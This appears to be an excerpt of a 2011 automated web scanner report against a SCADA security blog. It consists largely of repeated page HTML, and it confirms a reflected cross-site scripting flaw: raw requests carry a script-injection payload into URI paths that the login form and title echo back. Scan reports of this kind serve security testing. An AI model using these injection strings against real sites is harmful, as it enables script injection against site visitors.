</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables ..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:39 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css '"-->< Style>< Script><script>netsparker(0x000427)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-admin/css/\'\"--></style></script><script>netsparker(0x000427)</script>/?_login=63d51667a3"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-admin/css/\'\"--></style></script><script>netsparker(0x000427)</script>/?_login=2fdeaa8b4a" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables ..
|
- /wp-admin/css/colors-fresh.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00042B)%3C/script%3E
/wp-admin/css/colors-fresh.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00042B)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| ver | GET | 20110121 |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x00042B)</script> |
Request
GET /wp-admin/css/colors-fresh.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00042B)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:41 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css Colors-fresh Css'"-->< Style>< Script><script>netsparker(0x00042B)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-admin/css/colors-fresh.css\'\"--></style></script><script>netsparker(0x00042B)</script>/?_login=175314aab4"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-admin/css/colors-fresh.css\'\"--></style></script><script>netsparker(0x00042B)</script>/?_login=1eb901e58d" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div 